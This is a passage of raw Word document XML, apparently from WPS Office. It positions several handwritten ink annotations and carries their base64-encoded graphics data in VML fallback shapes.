kcnMvX3JlbHMvUEsBAhQAFAAAAAgAh07iQHkYvJ24&#10;AAAAIQEAABkAAAAAAAAAAQAgAAAA7QgAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwECFAAU&#10;AAAACACHTuJA+sg6WdkAAAAKAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsB&#10;AhQAFAAAAAgAh07iQG9y9HSdAQAAigMAAA4AAAAAAAAAAQAgAAAAKAEAAGRycy9lMm9Eb2MueG1s&#10;UEsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAQAAAA8QIAAGRycy9pbmsvUEsB&#10;AhQAFAAAAAgAh07iQHhQQJNiBAAASgoAABAAAAAAAAAAAQAgAAAAFwMAAGRycy9pbmsvaW5rMS54&#10;bWxQSwUGAAAAAAoACgBMAgAAEgsAAAAA&#10;">
                <v:imagedata r:id="rId68" o:title=""/>
                <o:lock v:ext="edit"/>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5299710</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2540</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="477520" cy="85725"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="57" name="墨迹 57"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId69">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="57" name="墨迹 57"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="5985510" y="8247380"/>
                            <a:ext cx="477520" cy="85725"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:417.3pt;margin-top:0.2pt;height:6.75pt;width:37.6pt;z-index:251678720;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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5GLyduAAAACEB&#10;AAAZAAAAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc4XPsWrEMAwG4L3QdzDaGyUdylHiZDkOspYU&#10;bjWOkpjEsrGc0nv7euzBwQ0ahND3S23/63f1Q0lcYA1NVYMitmFyvGj4Hi9vJ1CSDU9mD0wabiTQ&#10;d68v7RftJpclWV0UVRQWDWvO8RNR7EreSBUicZnMIXmTS5sWjMZuZiF8r+sPTP8N6O5MNUwa0jA1&#10;oMZbLMnP7TDPztI52MMT5wcRaA/JwV/9XlCTFsoaHG9YqqnKoYBdi3ePdX9QSwMEFAAAAAgAh07i&#10;QAMVKdoFAQAALQIAABMAAABbQ29udGVudF9UeXBlc10ueG1slZHBTsMwEETvSPyD5StKnPaAEGrS&#10;AylHQKh8gGVvEqv22vKa0P49TtpeEKXi4IO9M29G69V67ywbIZLxWPNFWXEGqLw22Nf8Y/tcPHBG&#10;SaKW1iPU/ADE183tzWp7CEAsu5FqPqQUHoUgNYCTVPoAmCedj06mfI29CFLtZA9iWVX3QnlMgKlI&#10;E4M3qxY6+WkT2+zz87FJBEucPR2FU1bNZQjWKJlyUzGi/pFSnBLK7Jw1NJhAd7kGF78mTJPLASff&#10;a15NNBrYm4zpRbpcQ+hIQvsvjDCWf0Omlo4K33VGQdlGarPtHcZzq0t0WPrWq//CN7PrGtvgTuSz&#10;uELPEmfPLDF/dvMNUEsBAhQAFAAAAAgAh07iQAMVKdoFAQAALQIAABMAAAAAAAAAAQAgAAAAaQgA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAABgAAAAAAAAAA&#10;ABAAAAA0BgAAX3JlbHMvUEsBAhQAFAAAAAgAh07iQIoUZjzRAAAAlAEAAAsAAAAAAAAAAQAgAAAA&#10;WAYAAF9yZWxzLy5yZWxzUEsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAQAAAA&#10;AAAAAGRycy9QSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAACgAAAAAAAAAAABAAAABSBwAAZHJz&#10;L19yZWxzL1BLAQIUABQAAAAIAIdO4kB5GLyduAAAACEBAAAZAAAAAAAAAAEAIAAAAHoHAABkcnMv&#10;X3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsBAhQAFAAAAAgAh07iQAwyK0LXAAAABwEAAA8AAAAAAAAA&#10;AQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kD/J/OAogEAAIkDAAAOAAAA&#10;AAAAAAEAIAAAACYBAABkcnMvZTJvRG9jLnhtbFBLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAI&#10;AAAAAAAAAAAAEAAAAPQCAABkcnMvaW5rL1BLAQIUABQAAAAIAIdO4kAjRadA7AIAAPMGAAAQAAAA&#10;AAAAAAEAIAAAABoDAABkcnMvaW5rL2luazEueG1sUEsFBgAAAAAKAAoATAIAAJ8JAAAAAA==&#10;">
                <v:imagedata r:id="rId70" o:title=""/>
                <o:lock v:ext="edit"/>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5309870</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>142240</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="469900" cy="83185"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="58" name="墨迹 58"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId71">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="58" name="墨迹 58"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="5995670" y="8387080"/>
                            <a:ext cx="469900" cy="83185"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:418.1pt;margin-top:11.2pt;height:6.55pt;width:37pt;z-index:251679744;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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&#10;CoD2L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HkYvJ24AAAAIQEAABkAAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzhc+xasQwDAbgvdB3&#10;MNobJR3KUeJkOQ6ylhRuNY6SmMSysZzSe/t67MHBDRqE0PdLbf/rd/VDSVxgDU1VgyK2YXK8aPge&#10;L28nUJINT2YPTBpuJNB3ry/tF+0mlyVZXRRVFBYNa87xE1HsSt5IFSJxmcwheZNLmxaMxm5mIXyv&#10;6w9M/w3o7kw1TBrSMDWgxlssyc/tMM/O0jnYwxPnBxFoD8nBX/1eUJMWyhocb1iqqcqhgF2Ld491&#10;f1BLAwQUAAAACACHTuJAAxUp2gUBAAAtAgAAEwAAAFtDb250ZW50X1R5cGVzXS54bWyVkcFOwzAQ&#10;RO9I/IPlK0qc9oAQatIDKUdAqHyAZW8Sq/ba8prQ/j1O2l4QpeLgg70zb0br1XrvLBshkvFY80VZ&#10;cQaovDbY1/xj+1w8cEZJopbWI9T8AMTXze3NansIQCy7kWo+pBQehSA1gJNU+gCYJ52PTqZ8jb0I&#10;Uu1kD2JZVfdCeUyAqUgTgzerFjr5aRPb7PPzsUkES5w9HYVTVs1lCNYomXJTMaL+kVKcEsrsnDU0&#10;mEB3uQYXvyZMk8sBJ99rXk00GtibjOlFulxD6EhC+y+MMJZ/Q6aWjgrfdUZB2UZqs+0dxnOrS3RY&#10;+tar/8I3s+sa2+BO5LO4Qs8SZ88sMX928w1QSwECFAAUAAAACACHTuJAAxUp2gUBAAAtAgAAEwAA&#10;AAAAAAABACAAAAA+CAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIUAAoAAAAAAIdO4kAAAAAAAAAA&#10;AAAAAAAGAAAAAAAAAAAAEAAAAAkGAABfcmVscy9QSwECFAAUAAAACACHTuJAihRmPNEAAACUAQAA&#10;CwAAAAAAAAABACAAAAAtBgAAX3JlbHMvLnJlbHNQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAA&#10;BAAAAAAAAAAAABAAAAAAAAAAZHJzL1BLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAKAAAAAAAA&#10;AAAAEAAAACcHAABkcnMvX3JlbHMvUEsBAhQAFAAAAAgAh07iQHkYvJ24AAAAIQEAABkAAAAAAAAA&#10;AQAgAAAATwcAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwECFAAUAAAACACHTuJA0qrgNNkA&#10;AAAJAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQJPX&#10;pzedAQAAigMAAA4AAAAAAAAAAQAgAAAAKAEAAGRycy9lMm9Eb2MueG1sUEsBAhQACgAAAAAAh07i&#10;QAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAQAAAA8QIAAGRycy9pbmsvUEsBAhQAFAAAAAgAh07iQO0n&#10;eBfEAgAAkAYAABAAAAAAAAAAAQAgAAAAFwMAAGRycy9pbmsvaW5rMS54bWxQSwUGAAAAAAoACgBM&#10;AgAAdAkAAAAA&#10;">
                <v:imagedata r:id="rId72" o:title=""/>
                <o:lock v:ext="edit"/>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5308600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>292735</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="452755" cy="65405"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="59" name="墨迹 59"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId73">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="59" name="墨迹 59"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="5994400" y="8537575"/>
                            <a:ext cx="452755" cy="65405"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:418pt;margin-top:23.05pt;height:5.15pt;width:35.65pt;z-index:251680768;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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HkY&#10;vJ24AAAAIQEAABkAAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzhc+xasQwDAbgvdB3MNobJR3K&#10;UeJkOQ6ylhRuNY6SmMSysZzSe/t67MHBDRqE0PdLbf/rd/VDSVxgDU1VgyK2YXK8aPgeL28nUJIN&#10;T2YPTBpuJNB3ry/tF+0mlyVZXRRVFBYNa87xE1HsSt5IFSJxmcwheZNLmxaMxm5mIXyv6w9M/w3o&#10;7kw1TBrSMDWgxlssyc/tMM/O0jnYwxPnBxFoD8nBX/1eUJMWyhocb1iqqcqhgF2Ld491f1BLAwQU&#10;AAAACACHTuJAAxUp2gUBAAAtAgAAEwAAAFtDb250ZW50X1R5cGVzXS54bWyVkcFOwzAQRO9I/IPl&#10;K0qc9oAQatIDKUdAqHyAZW8Sq/ba8prQ/j1O2l4QpeLgg70zb0br1XrvLBshkvFY80VZcQaovDbY&#10;1/xj+1w8cEZJopbWI9T8AMTXze3NansIQCy7kWo+pBQehSA1gJNU+gCYJ52PTqZ8jb0IUu1kD2JZ&#10;VfdCeUyAqUgTgzerFjr5aRPb7PPzsUkES5w9HYVTVs1lCNYomXJTMaL+kVKcEsrsnDU0mEB3uQYX&#10;vyZMk8sBJ99rXk00GtibjOlFulxD6EhC+y+MMJZ/Q6aWjgrfdUZB2UZqs+0dxnOrS3RY+tar/8I3&#10;s+sa2+BO5LO4Qs8SZ88sMX928w1QSwECFAAUAAAACACHTuJAAxUp2gUBAAAtAgAAEwAAAAAAAAAB&#10;ACAAAAA4CAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAG&#10;AAAAAAAAAAAAEAAAAAMGAABfcmVscy9QSwECFAAUAAAACACHTuJAihRmPNEAAACUAQAACwAAAAAA&#10;AAABACAAAAAnBgAAX3JlbHMvLnJlbHNQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAABAAAAAAA&#10;AAAAABAAAAAAAAAAZHJzL1BLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAKAAAAAAAAAAAAEAAA&#10;ACEHAABkcnMvX3JlbHMvUEsBAhQAFAAAAAgAh07iQHkYvJ24AAAAIQEAABkAAAAAAAAAAQAgAAAA&#10;SQcAAGRycy9fcmVscy9lMm9Eb2MueG1sLnJlbHNQSwECFAAUAAAACACHTuJAGfdcR9gAAAAJAQAA&#10;DwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQAGqtpCfAQAA&#10;igMAAA4AAAAAAAAAAQAgAAAAJwEAAGRycy9lMm9Eb2MueG1sUEsBAhQACgAAAAAAh07iQAAAAAAA&#10;AAAAAAAAAAgAAAAAAAAAAAAQAAAA8gIAAGRycy9pbmsvUEsBAhQAFAAAAAgAh07iQDM5WJq9AgAA&#10;iwYAABAAAAAAAAAAAQAgAAAAGAMAAGRycy9pbmsvaW5rMS54bWxQSwUGAAAAAAoACgBMAgAAbgkA&#10;AAAA&#10;">
                <v:imagedata r:id="rId74" o:title=""/>
                <o:lock v:ext="edit"/>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5253990</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>441960</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="516890" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="60" name="墨迹 60"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId75">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="60" name="墨迹 60"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="5939790" y="8686800"/>
                            <a:ext cx="516890" cy="142875"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:413.7pt;margin-top:34.8pt;height:11.25pt;width:40.7pt;z-index:251681792;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" 